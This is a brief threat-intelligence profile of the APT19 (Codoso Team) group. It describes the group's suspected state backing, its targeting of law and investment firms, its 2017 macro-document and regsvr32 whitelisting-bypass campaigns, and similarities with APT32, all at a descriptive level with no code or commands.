APT19

APT19, also known as the Codoso Team, is a threat actor suspected to be sponsored by the Chinese government to some degree. This group, potentially composed of freelancers, primarily targets the legal and investment sectors. They are known for their use of sophisticated malware like BEACON and COBALTSTRIKE to compromise their targets. In 2017, APT19 utilized three different techniques in their attempts to breach security systems. By the end of May that year, they began using macro-enabled Microsoft Excel (XLSM) documents as a new method of attack. In subsequent versions of these attacks, APT19 incorporated an application whitelisting bypass into the XLSM documents, demonstrating an evolution in their methods. The regsvr32.exe application whitelisting bypass was also leveraged by several groups, including APT19, in their 2017 campaign against law firms. Notably, APT19's tactics bear similarities to those of another cyber espionage group, APT32. Both groups are known for heavily obfuscating their backdoors and scripts to evade detection. For instance, Mandiant consultants observed APT32 implementing additional command argument obfuscation in April 2017. These parallels highlight the evolving and shared strategies among threat actors, underscoring the need for continuous advancements in cybersecurity defenses.